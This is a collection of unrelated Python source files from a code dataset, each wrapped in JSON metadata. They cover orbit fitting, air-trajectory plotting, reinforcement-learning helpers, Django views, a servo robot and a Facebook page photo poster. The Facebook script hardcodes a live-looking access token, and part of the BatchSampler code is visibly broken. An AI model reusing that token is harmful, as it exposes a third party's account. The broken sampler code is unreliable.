EQ_rho_z]\r\n EQ_mag = sqrt(EQ_rho_x**2+EQ_rho_y**2+EQ_rho_z**2)\r\n for i in range(len(EQ_rho)):\r\n EQ_rho[i] /= EQ_mag\r\n\r\n # calculate RA and DEC\r\n DEC = asin(EQ_rho[2])\r\n sinRA = EQ_rho[1]/cos(DEC)\r\n cosRA = EQ_rho[0]/cos(DEC)\r\n RA = findQuadrant(sinRA, cosRA)\r\n\r\n return degrees(RA)/15, degrees(DEC)\r\n\r\ne, a, I, OM, om, M = [], [], [], [], [], []\r\nEs, As, Is, Os, Ws, Ms = open(\"egrace.txt\"), open(\"agrace.txt\"), open(\"Igrace.txt\"), open(\"Ograce.txt\"), open(\"wgrace.txt\"), open(\"Mgrace.txt\"), \r\nfor line in Es:\r\n trimmed = line.strip()\r\n e.append(float(trimmed))\r\nfor line in As:\r\n trimmed = line.strip()\r\n a.append(float(trimmed))\r\nfor line in Is:\r\n trimmed = line.strip()\r\n I.append(float(trimmed))\r\nfor line in Os:\r\n trimmed = line.strip()\r\n OM.append(float(trimmed))\r\nfor line in Ws:\r\n trimmed = line.strip()\r\n om.append(float(trimmed))\r\nfor line in Ms:\r\n trimmed = line.strip()\r\n M.append(float(trimmed))\r\n#print(e, a, I, OM, om, M)\r\nRAs, DECs, JDs = [], [], [] #7 each\r\nRs = np.array([[0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0],\r\n [0.0, 0.0, 0.0]]) #7 by 3 array\r\n\r\ndata = open(\"Input.txt\")\r\nlineN = 0\r\nfor line in data:\r\n values = line.split()\r\n Y = int(values[0])\r\n m = int(values[1])\r\n D = int(values[2])\r\n t = values[3]\r\n timeParts = 
t.split(\":\")\r\n UT = float(timeParts[0])+float(timeParts[1])/60+float(timeParts[2])/3600\r\n J0 = 367*Y-int((7/4)*(Y+int((m+9)/12)))+int(275*m/9)+D+1721013.5\r\n JD = J0 + UT/24\r\n JDs.append(JD)\r\n ra = float(values[4])+float(values[5])/60+float(values[6])/3600\r\n RAs.append(radians(ra*15))\r\n if float(values[7]) > 0:\r\n dec = float(values[7])+float(values[8])/60+float(values[9])/3600\r\n else:\r\n dec = float(values[7])-float(values[8])/60-float(values[9])/3600\r\n DECs.append(radians(dec))\r\n A = float(values[10])\r\n B = float(values[11])\r\n C = float(values[12])\r\n Rs[lineN][0] = A\r\n Rs[lineN][1] = B\r\n Rs[lineN][2] = C\r\n lineN += 1\r\n#print(RAs, DECs, JDs)\r\n#print(Rs)\r\n\r\ncE, cA, cI, cO, cW, cM = 0, 0, 0, 0, 0, 0\r\nminErr = 10**31\r\nfor index in range(len(e)):\r\n currE, currA, currI, currO, currW, currM = e[index], a[index], I[index], OM[index], om[index], M[index]\r\n t = 2458685.75\r\n fitRAs, fitDECs = [], []\r\n for ind in range(0, 7):\r\n ra, dec, jd = RAs[ind], DECs[ind], JDs[ind]\r\n R = Rs[ind]\r\n RA, DEC = RA_DEC(currE, currA, currI, currO, currW, currM, ind, t, R)\r\n fitRAs.append(RA)\r\n fitDECs.append(DEC)\r\n alphaSq, deltaSq = 0, 0\r\n for ind in range(len(RAs)):\r\n alphaSq += (RAs[ind] - fitRAs[ind])**2\r\n deltaSq += (DECs[ind] - fitDECs[ind])**2\r\n error = sqrt((alphaSq+deltaSq)/(14 - 6))\r\n if(error < minErr):\r\n minErr = error\r\n cE, cA, cI, cO, cW, cM = currE, currA, currI, currO, currW, currM\r\nprint(\"a = %f AU\" %cA)\r\nprint(\"e = %f\" %cE)\r\nprint(\"I = %f degrees\" %cI)\r\nprint(\"OM = %f degrees\" %cO)\r\nprint(\"om = %f degrees\" %cW)\r\nprint(\"M = %f degrees\" %cM)\r\n","sub_path":"Coding/Monster EC/monsterEphem.py","file_name":"monsterEphem.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"63519938","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\n\n# Global variables\nEARTH_RADIUS = 6371e3 # meters\n\ndef haversine(latitude1, longitude1, latitude2, longitude2):\n \"\"\" Great-circle distance between two points. Latitudes and longitudes\n are 1D NumPy arrays. \n Returns a 1D array of distances between two trajectories. 
\"\"\"\n\n lat1 = np.radians(latitude1)\n lat2 = np.radians(latitude2)\n lon1 = np.radians(longitude1)\n lon2 = np.radians(longitude2)\n\n dlat = np.absolute(lat2 - lat1)\n dlon = np.absolute(lon2 - lon1)\n\n a = (np.sin(dlat / 2) ** 2 + np.cos(lat1) * np.cos(lat2) \n * np.sin(dlon / 2) ** 2)\n c = 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a)) \n d = EARTH_RADIUS * c # distance in meters\n return d\n\nclass Trajectory:\n \"\"\" Version of trajectory class for analyzing trajectory data from \n text files.\"\"\"\n \n def __init__(self,\n scheme=\"grid\", # \"grid\" or \"force\"\n timestep=90, \n source=\"model\", # \"model\" or \"hysplit\"\n location=\"boston\", # \"boston\"\n vertical=\"3D\"): # \"3D\" or \"isobaric\" \n self.scheme = scheme # Trajectory calculation scheme\n self.timestep = timestep # Timestep in seconds\n self.source = source # Study models or HYSPLIT trajectories\n self.location = location # Parcel launch site \n self.vertical = vertical # Vertical transport scheme\n\n if source == \"model\":\n lat_title = (\"trajectory_data/{0}_latitudes_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n lon_title = (\"trajectory_data/{0}_longitudes_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n u_title = (\"trajectory_data/{0}_trajectory_u_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n v_title = (\"trajectory_data/{0}_trajectory_v_{1}_{2}.txt\").format(\n self.location, self.scheme, self.timestep)\n\n self.latitudes = np.loadtxt(lat_title)\n self.longitudes = np.loadtxt(lon_title)\n self.trajectory_u = np.loadtxt(u_title)\n self.trajectory_v = np.loadtxt(v_title)\n\n # List of times in hours\n self.times = np.arange(np.size(self.latitudes[:,0])) * (\n self.timestep / 60 ** 2)\n\n if source == \"hysplit\":\n\n self.latitudes, self.longitudes, self.times = self.load_hysplit()\n self.trajectory_u = np.zeros_like(self.latitudes)\n self.trajectory_v = np.zeros_like(self.longitudes)\n\n self.mean_latitudes, self.mean_longitudes = self.mean_trajectory()\n\n def load_hysplit(self):\n # Get 1D lat and lon vectors from file\n num_trajectories = 25\n file = np.loadtxt(\"trajectory_data/hysplit_{0}_{1}.txt\".format(\n self.vertical, self.location))\n file_time = file[:,8] # time in hours\n file_lat = file[:,9]\n file_lon = file[:,10]\n\n # Initialize latitude and longitude arrays\n num_rows = np.size(file_lat) // num_trajectories\n latitude = np.zeros((num_rows, num_trajectories))\n longitude = np.zeros_like(latitude)\n time = np.zeros_like(latitude)\n \n # Separate lats and lons by trajectory\n for i in np.arange(np.size(latitude)):\n row = i // num_trajectories\n column = i % num_trajectories\n\n time[row, column] = file_time[i]\n latitude[row, column] = file_lat[i]\n longitude[row, column] = file_lon[i]\n\n return latitude, longitude, time\n\n def mean_trajectory(self):\n \"\"\" Get the centroid of parcels at each timestep. 
\"\"\"\n\n # Convert latitudes and longitudes to Cartesian coordinates\n x = (np.cos(np.radians(self.latitudes)) * \n np.cos(np.radians(self.longitudes)))\n y = (np.cos(np.radians(self.latitudes)) * \n np.sin(np.radians(self.longitudes)))\n z = np.sin(np.radians(self.latitudes))\n\n # Get average x, y, z values\n mean_x = np.mean(x, axis=1)\n mean_y = np.mean(y, axis=1)\n mean_z = np.mean(z, axis=1)\n\n # Convert average values to trajectory latitudes and longitudes\n mean_longitudes = np.degrees(np.arctan2(mean_y, mean_x))\n hypotenuse = np.sqrt(mean_x ** 2 + mean_y ** 2)\n mean_latitudes = np.degrees(np.arctan2(mean_z, hypotenuse))\n\n return mean_latitudes, mean_longitudes\n\n def rms_distance(self):\n \"\"\" Calculate the root mean square distance of each trajectory from the\n mean trajectory. \"\"\"\n\n # Make mean lat and lon arrays the same shape as trajectory arrays\n mean_lat = np.repeat(self.mean_latitudes[:, np.newaxis], \n np.size(self.latitudes, axis=1), axis=1)\n mean_lon = np.repeat(self.mean_longitudes[:, np.newaxis], \n np.size(self.longitudes, axis=1), axis=1)\n\n rms = np.sqrt(np.mean(haversine(mean_lat, mean_lon, \n self.latitudes, self.longitudes) ** 2, axis=1))\n\n return rms\n\n def plot_ortho(self, lat_center=90, lon_center=-50, savefig=False):\n \"\"\" Orthographic projection plot.\"\"\"\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c')\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n # draw the edge of the map projection region (the projection limb)\n map.drawmapboundary(fill_color='white')\n map.plot(self.longitudes, self.latitudes,\n latlon=True, zorder=2, color='black')\n #map.plot(self.mean_longitudes, self.mean_latitudes,\n # latlon=True, zorder=2, color='green')\n if savefig == True:\n filename1 = \"plots/friction_180.pdf\"\n plt.savefig(filename1)\n\n plt.show()\n return map\n\n def graph_speed(self):\n \"\"\" Graph of u and v along the trajectory. \"\"\"\n lat_length = 111.32e3 # Length of a degree of latitude in meters\n time = np.arange(np.size(self.latitudes[:,0])) * (self.timestep \n / (60 ** 2 * 24))\n v_threshold = ((0.75 * 0.25 * lat_length) / self.timestep \n * np.ones(np.size(time)))\n v_threshold = v_threshold[:, np.newaxis]\n v_diff = v_threshold - self.trajectory_v\n\n u_threshold = (0.75 * 0.25 * lat_length \n * np.cos(np.radians(self.latitudes))) / self.timestep\n u_diff = u_threshold - self.trajectory_u\n\n zero = np.zeros(np.size(time))\n \n # new style method 1; unpack the axes\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, sharey=True)\n u_line = ax1.plot(time, u_diff, color=\"black\", linewidth=1)\n u_zero_line = ax1.plot(time, zero, color=\"black\", linestyle=\"--\",\n linewidth=2)\n ax1.set_title(\"Dynamic Trajectory Zonal Speeds\")\n\n v_line = ax2.plot(time, v_diff, color=\"black\", linewidth=1)\n v_zero_line = ax2.plot(time, zero, color=\"black\", linestyle=\"--\",\n linewidth=2)\n ax2.set_title(\"Dynamic Trajectory Meridional Speeds\")\n\n plt.xlabel(\"Time in days\")\n plt.ylabel(\" \" #label padding\n \"Velocity in m/s\")\n #plt.savefig(\"plots/timestep_friction_120.eps\")\n #plt.show()\n return ax1, ax2\n\n def threshold(self):\n \"\"\" Difference between model and HYSPLIT threshold speeds. 
\"\"\"\n lat_length = 111.32e3 # Length of a degree of latitude in meters\n time = np.arange(np.size(self.latitudes[:,0])) * (self.timestep \n / (60 ** 2 * 24))\n v_threshold = ((0.75 * 0.25 * lat_length) / self.timestep \n * np.ones(np.size(time)))\n v_threshold = v_threshold[:, np.newaxis]\n v_diff = v_threshold - self.trajectory_v\n\n u_threshold = (0.75 * 0.25 * lat_length \n * np.cos(np.radians(self.latitudes))) / self.timestep\n u_diff = u_threshold - self.trajectory_u\n return u_diff, v_diff, time\n\n def graph_rms(self):\n \"\"\" Graph of rms distance from mean trajectory. \"\"\"\n rms = self.rms_distance()\n\n fig = plt.figure()\n ax2 = fig.add_subplot(1, 1, 1)\n\n rms_line, = ax2.plot(self.times, rms)\n #t_half_line, = ax2.plot(self.times, self.times ** 0.5)\n \n ax2.set_title(\"RMS Distance from Mean Trajectory\")\n ax2.set_xlabel(\"Time (hours)\")\n ax2.set_ylabel(\"RMS distance (m)\")\n plt.show()\n return rms[-1]\n\ndef trajectory_subplots():\n location = \"boston\"\n map_type = \"ortho\"\n lat_center = 90\n lon_center = -71\n\n trajectory_friction = Trajectory(scheme=\"friction\", timestep=90,\n source=\"model\", location=location)\n trajectory_grid = Trajectory(scheme=\"grid\", timestep=90, \n source=\"model\", location=location)\n trajectory_3d = Trajectory(scheme=\"friction\", timestep=90, \n source=\"hysplit\", location=location, vertical=\"3D\")\n trajectory_iso = Trajectory(scheme=\"grid\", timestep=90, \n source=\"hysplit\", location=location, vertical=\"isobaric\")\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, \n figsize=(8, 8))\n\n if map_type == \"ortho\":\n ax1.set_title(\"Kinematic Model\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax1)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_grid.longitudes, trajectory_grid.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax2.set_title(\"Dynamic Model\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax2)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_friction.longitudes, trajectory_friction.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax3.set_title(\"3D HYSPLIT\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=40, \n resolution='c', ax=ax3)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_3d.longitudes, trajectory_3d.latitudes,\n latlon=True, zorder=2, color='black')\n\n ax4.set_title(\"Isobaric HYSPLIT\")\n map = Basemap(projection='ortho', lon_0=lon_center, lat_0=lat_center, \n resolution='c', ax=ax4)\n map.drawcoastlines(linewidth=0.25, color='gray')\n map.drawcountries(linewidth=0)\n map.fillcontinents(color='white',lake_color='white', zorder=1)\n map.drawmapboundary(fill_color='white')\n map.plot(trajectory_iso.longitudes, trajectory_iso.latitudes,\n latlon=True, zorder=2, color='black')\n\n plt.savefig(\"plots/four_ortho.pdf\")\n\n plt.show()\n \n\ndef speed_subplots():\n \"\"\" Graph u and v speeds for two schemes. 
\"\"\"\n trajectory_friction = Trajectory(scheme=\"friction\", timestep=180, \n source=\"model\")\n trajectory_grid = Trajectory(scheme=\"grid\", timestep=180, source=\"model\")\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex=True, sharey=True, \n figsize=(10, 6))\n # add a big axis, hide frame\n fig.add_subplot(111, frameon=False)\n # hide tick and tick label of the big axes\n plt.tick_params(labelcolor='none', top='off', bottom='off', left='off', \n right='off')\n\n (u_diff_grid, v_diff_grid, time) = trajectory_grid.threshold()\n (u_diff_friction, v_diff_friction, time) = trajectory_friction.threshold()\n zero = np.zeros(np.size(u_diff_grid[:,0]))\n\n ax1.plot(time, -u_diff_grid, color=\"black\", linewidth=1)\n ax1.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax1.set_title(\"Kinematic Trajectory Zonal Speeds\", fontsize=12)\n ax1.set_ylim(-290, 45)\n\n ax2.plot(time, -u_diff_friction, color=\"black\", linewidth=1)\n ax2.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax2.set_title(\"Dynamic Trajectory Zonal Speeds\", fontsize=12)\n ax2.set_ylim(-290, 45)\n\n ax3.plot(time, -v_diff_grid, color=\"black\", linewidth=1)\n ax3.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax3.set_title(\"Kinematic Trajectory Meridional Speeds\", fontsize=12)\n ax3.set_ylim(-290, 45)\n\n ax4.plot(time, -v_diff_friction, color=\"black\", linewidth=1)\n ax4.plot(time, zero, color=\"black\", linestyle=\"--\", linewidth=2)\n ax4.set_title(\"Dynamic Trajectory Meridional Speeds\", fontsize=12)\n ax4.set_ylim(-290, 45)\n\n plt.xlabel(\"Time (days)\")\n plt.ylabel(\"Velocity (m/s) \")\n\n plt.savefig(\"plots/speed_subplots_180_negative.pdf\")\n\n plt.show()\n\ndef deviation():\n # Need to fix this probably\n scheme = \"friction\"\n location = \"barau\"\n vertical = \"isobaric\"\n num_trajectories = 25\n\n experimental = Trajectory(scheme=scheme, timestep=90, source=\"model\", \n location=location)\n reference = Trajectory(scheme=scheme, timestep=90, source=\"hysplit\", \n location=location, vertical=vertical)\n\n # Find indices of times in experimental that match times in reference\n time_index = np.searchsorted(experimental.times, reference.times)[:,0]\n\n # Select times, latitudes and longitudes from experimental in reference\n reduced_times = experimental.times[time_index]\n reduced_latitudes = experimental.latitudes[time_index]\n reduced_longitudes = experimental.longitudes[time_index]\n\n distance = haversine(reduced_latitudes, reduced_longitudes,\n reference.latitudes, reference.longitudes)\n\n ahtd = np.sqrt(np.sum(distance ** 2, axis=1)) / num_trajectories\n mean_distance = np.sqrt(np.sum(distance, axis=1)) / num_trajectories\n\n reference_distance = haversine(reference.latitudes[1:,:], \n reference.longitudes[1:,:], reference.latitudes[:-1,:],\n reference.longitudes[:-1,:]) \n\n l_h = (np.sum(np.sqrt(np.sum(reference_distance ** 2, axis=1))) \n / num_trajectories)\n\n rhtd = ahtd / l_h\n\n fig = plt.figure()\n ax1 = fig.add_subplot(1, 1, 1)\n\n ax1.plot(reduced_times, ahtd)\n #t_half_line, = ax2.plot(self.times, self.times ** 0.5)\n\n ax1.set_xlabel(\"Time (hours)\")\n ax1.set_ylabel(\"RHTD\")\n plt.show()\n\n return rhtd\n\ndef reference_deviation():\n location = \"boston\"\n num_trajectories = 25\n\n reference_3d = Trajectory(timestep=90, source=\"hysplit\", \n location=location, vertical=\"3D\")\n reference_iso = Trajectory(timestep=90, source=\"hysplit\", \n location=location, vertical=\"isobaric\")\n\n distance = 
haversine(reference_3d.latitudes, reference_3d.longitudes,\n reference_iso.latitudes, reference_iso.longitudes)\n\n ahtd = np.sqrt(np.sum(distance ** 2, axis=1)) / num_trajectories\n\n reference_distance = haversine(reference_3d.latitudes[1:,:], \n reference_3d.longitudes[1:,:], reference_iso.latitudes[:-1,:],\n reference_iso.longitudes[:-1,:]) \n\n l_h = (np.sum(np.sqrt(np.sum(reference_distance ** 2, axis=1))) \n / num_trajectories)\n\n rhtd = ahtd / l_h\n\n return rhtd\n\ntrajectory_subplots()\n#print(\"rhtd is \\n\", rhtd)\n#print(\"last rhtd is\", rhtd[-1])\n\n# tra = Trajectory(scheme=\"friction\", timestep=90, source=\"model\", \n# location=\"barau\", vertical=\"3D\")\n# tra.plot_ortho()\n# last_rms = tra.graph_rms()\n# print(\"Last RMSE value is\", last_rms)","sub_path":"trajectory_from_file.py","file_name":"trajectory_from_file.py","file_ext":"py","file_size_in_byte":16274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"474707631","text":"# Some helper functions for using garage\n\n\nimport numpy as np\nimport torch\n\nfrom garage.torch.policies import GaussianMLPPolicy, TanhGaussianMLPPolicy, DeterministicMLPPolicy\nfrom garage.torch.q_functions import ContinuousMLPQFunction\nfrom garage.torch.value_functions import GaussianMLPValueFunction\nfrom garage.sampler import FragmentWorker, LocalSampler, RaySampler\nfrom garage.torch.optimizers import OptimizerWrapper\n\n\ndef get_mlp_policy(*,\n env_spec,\n stochastic=True,\n clip_output=False,\n hidden_sizes=(64, 64),\n hidden_nonlinearity=torch.tanh,\n min_std=np.exp(-20.),\n max_std=np.exp(2.)):\n\n if stochastic and clip_output:\n return TanhGaussianMLPPolicy(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n min_std=min_std,\n max_std=max_std)\n\n if stochastic and not clip_output:\n return GaussianMLPPolicy(env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None)\n\n if not stochastic:\n return DeterministicMLPPolicy(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=torch.tanh if clip_output else None)\n\n\n\ndef get_mlp_value(form='Q',\n *,\n env_spec,\n hidden_sizes=(256, 128),\n hidden_nonlinearity=torch.tanh,\n ensemble_size=1,\n ensemble_mode='P'\n ):\n\n if form=='Q':\n return ContinuousMLPQFunction(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None)\n if form=='V':\n return GaussianMLPValueFunction(\n env_spec=env_spec,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n output_nonlinearity=None,\n learn_std=False)\n\n\n\ndef collect_episode_batch(policy, *,\n env,\n batch_size,\n n_workers=4):\n \"\"\"Obtain one batch of episodes.\"\"\"\n sampler = get_sampler(policy, env=env, n_workers=n_workers)\n agent_update = policy.get_param_values()\n episodes = sampler.obtain_samples(0, batch_size, agent_update)\n return episodes\n\nfrom garage.sampler import Sampler\nimport copy\nfrom garage._dtypes import EpisodeBatch\nclass BatchSampler(Sampler):\n\n def __init__(self, episode_batch, randomize=True):\n self.episode_batch = episode_batch\n self.randomize = randomize\n self._counter = 0\n\n def obtain_samples(self, itr, num_samples, agent_update, env_update=None):\n\n ns = self.episode_batch.lengths\n if num_samples=num_samples)[0]\n if len(itemindex)>0:\n ld = self.episode_batch.to_list()\n j_max 
= min(len(ld), itemindex[0]+1)\n ld = [ld[i] for i in ind[:j_max].tolist()]\n sampled_eb = EpisodeBatch.from_list(self.episode_batch.env_spec,ld)\n else:\n sampled_eb = None\n else:\n ns = self.episode_batch.lengths\n ind = np.arange(len(ns))\n cumsum_permuted_ns = np.cumsum(ns[ind])\n counter = int(self._counter)\n itemindex = np.where(cumsum_permuted_ns>=num_samples*(counter+1))[0]\n itemindex0 = np.where(cumsum_permuted_ns>num_samples*counter)[0]\n if len(itemindex)>0:\n ld = self.episode_batch.to_list()\n j_max = min(len(ld), itemindex[0]+1)\n j_min = itemindex0[0]\n ld = [ld[i] for i in ind[j_min:j_max].tolist()]\n sampled_eb = EpisodeBatch.from_list(self.episode_batch.env_spec,ld)\n self._counter+=1\n else:\n sampled_eb = None\n else:\n sampled_eb = self.episode_batch\n\n return sampled_eb\n\n def shutdown_worker(self):\n pass\n\n\ndef get_sampler(policy,\n *,\n env,\n n_workers=4,\n **kwargs): # other kwargs for the sampler\n\n if n_workers==1:\n return LocalSampler(agents=policy,\n envs=env,\n max_episode_length=env.spec.max_episode_length,\n worker_class=FragmentWorker,\n **kwargs)\n else:\n return RaySampler(agents=policy,\n envs=env,\n max_episode_length=env.spec.max_episode_length,\n n_workers=n_workers,\n **kwargs)\n\n\n\nfrom garage.replay_buffer import PathBuffer\n\ndef get_replay_buferr(capacity=int(1e6)):\n return PathBuffer(capacity_in_transitions=capacity)\n\ndef get_optimizer(obj, lr,\n *,\n max_optimization_epochs=1,\n minibatch_size=128):\n\n return OptimizerWrapper((torch.optim.Adam, dict(lr=lr)),\n obj,\n max_optimization_epochs=max_optimization_epochs,\n minibatch_size=minibatch_size)","sub_path":"hurl/rl_utils.py","file_name":"rl_utils.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"604466910","text":"from django.shortcuts import render\nfrom .models import Post1\nfrom .forms import PostForm\nfrom django.shortcuts import redirect, render\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\nfrom user_info.models import UserInfo, CustomUser\n\ndef FAQ(request):\n try:\n user = CustomUser.objects.get(email=request.user.email)\n except:\n return render(request, 'FAQ.html')\n \n post1 = Post1.objects.filter(writer=user) # 내가 쓴글만\n return render(request, 'FAQ.html', {'post1': post1})\n\n\ndef CS(request):\n if request.method == 'POST':\n post1 = Post1()\n post1.title = request.POST['title']\n post1.body = request.POST['body']\n post1.writer = CustomUser.objects.get(email=request.user.email)\n post1.post_time = str(timezone.now())[0:19]\n post1.save()\n return redirect('user_info:home')\n else:\n form = PostForm()\n return render(request, 'CS.html',{'post':form})","sub_path":"inquiry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"277596053","text":"import sys\n\ndef showhelp():\n help = \"\"\"\n Usage: translate [word or sentence]\n \"\"\"\n print(help)\n\n\ndef main(args=None):\n from .translate import tword\n if args is None :\n args = sys.argv[1:]\n\n if len(args) < 0:\n showhelp()\n else :\n tword(' '.join(args))\n\nif __name__ == \"__main__\":\n main()","sub_path":"src/translate/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"264288484","text":"#full documentation at: 
http://nodotcom.org/python-facebook-tutorial.html\n\nimport facebook, os\n\ndef photo_poster(image_obj=None, caption=None, photo_id=None):\n # Fill in the values noted in documentation here:\n\n PAGE_ID = '1812492382364506'#os.environ.get('FACEBOOK_PAGE_ID')\n ACCESS_TOKEN = 'EAAQWkmy1MFYBAF4kDKRuQ8fjj2ocphX9vzijqY0SFbT5IfmRG9bvzfyamBMVGllsABmXORILAPH9qmYojcTNpZBHM8wx2ZCxOFMdOuZCRgOuqYixCrsVgbD4bhFoa8yxMGwISqPOBZAqviGQlcZB7induz6m8ZAfcZD'#os.environ.get('FACEBOOK_ACCESS_TOKEN')\n\n cfg = {\n \"page_id\" : PAGE_ID, # Step 1\n \"access_token\" : ACCESS_TOKEN # Step 3\n }\n caption = caption+\" (https://damadam.pk/photo_detail/\"+str(photo_id)+\")\"\n # print cfg\n api = get_api(cfg)\n status = api.put_photo(image=(image_obj),message=caption)\n # print \"status: %s\" % status\n\ndef get_api(cfg):\n graph = facebook.GraphAPI(cfg['access_token'])\n # Get page token to post as the page. You can skip \n # the following if you want to post as yourself. \n resp = graph.get_object('me/accounts')\n # resp = graph.get_object('10154886323073885/accounts')\n # print \"getting own account: %s\" % resp\n page_access_token = None\n for page in resp['data']:\n if page['id'] == cfg['page_id']:\n page_access_token = page['access_token']\n graph = facebook.GraphAPI(page_access_token)\n return graph \n # You can also skip the above if you get a page token:\n # http://stackoverflow.com/questions/8231877/facebook-access-token-for-pages\n # and make that long-lived token as in Step 3\n","sub_path":"links/facebook_api.py","file_name":"facebook_api.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"446672367","text":"from adafruit_servokit import ServoKit\nfrom time import sleep\n\n''' PIN MAP:\n [0] is tail\n [1] is mid-tail\n [2] is hip\n [3] is mid-head\n [4] is head\n [5] is suction cup\n'''\n\nEXTEND = [65, 100, 90, 110, 65, -1]\nCURL = [170, 0, -1, 0, 159, -1]\n\nclass Robot:\n def __init__(self):\n self.kit = ServoKit(channels=16)\n self._unstick()\n self._set_all(EXTEND)\n\n self.stuck = False\n\n def _set_all(self, arr):\n \"\"\"\n _set_all(arr) - sets all servos to the values in the array\n :param arr: the array of ints for the servos angles. 
Use -1 to skip value\n :return: none\n \"\"\"\n for i in range(0,len(arr)):\n if arr[i] == -1:\n continue\n else:\n self.kit.servo[i].angle = arr[i]\n\n def _stick(self):\n \"\"\"\n _stick() - sticks the suction cup\n :return: none\n \"\"\"\n self.kit.servo[5].angle = 60\n self.stuck = True\n\n def _unstick(self):\n \"\"\"\n _unstick() - unsticks the suction cup\n :return: none\n \"\"\"\n self.kit.servo[5].angle = 130\n self.stuck = False\n\n def _curl_up(self):\n \"\"\"\n _curl_up() - arches the inchworm robot's back\n :return: none\n \"\"\"\n self._set_all(CURL)\n\n def _extend(self):\n \"\"\"\n _extend - straightens the inchworm robot's back\n :return: none\n \"\"\"\n self.kit.servo[0].angle = 120\n self.kit.servo[1].angle = 60\n sleep(0.15)\n self.kit.servo[3].angle = 20\n self.kit.servo[4].angle = 130\n sleep(0.15)\n self.kit.servo[3].angle = 60\n self.kit.servo[4].angle = 100\n sleep(0.15)\n self._set_all(EXTEND)\n\n def crawl(self):\n \"\"\"\n crawl() - executes the crawl sequence for the robot\n :return: none\n \"\"\"\n self._stick()\n sleep(0.5)\n self._curl_up()\n sleep(0.5)\n self._unstick()\n sleep(0.5)\n self._extend()\n sleep(0.5)\n\n def dance(self, cycles):\n \"\"\"\n dance() - does a little dance\n :param cycles: the number of dance wiggles to do\n :return: none\n \"\"\"\n for i in range(0,cycles):\n self.kit.servo[2].angle = 135\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.1)\n self.kit.servo[2].angle = 45\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.1)\n\n def turn(self, degrees):\n \"\"\"\n turn(degrees) - turns the robot in maximum steps of 45 degrees\n :param degrees: the total number of degrees to turn\n :return: none\n \"\"\"\n while degrees > 90 or degrees < -90:\n if degrees > 90:\n self.turn(90)\n degrees -= 90\n elif degrees < -90:\n self.turn(-90)\n degrees += 90\n\n self.kit.servo[2].angle = 90 + degrees\n sleep(0.5)\n self._stick()\n sleep(0.5)\n self.kit.servo[2].angle = 90\n sleep(0.5)\n self._unstick()\n sleep(0.5)\n\n def suction(self):\n if self.stuck:\n self._unstick()\n else:\n self._stick()\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"310036838","text":"import os\nimport numpy as np\n\nscan_folder_rel = 'simulations_less_mps'\n\nenvironment_preparation = f'''\nsource /afs/cern.ch/work/g/giadarol/sim_workspace_mpi_py3/venvs/py3/bin/activate\nsource 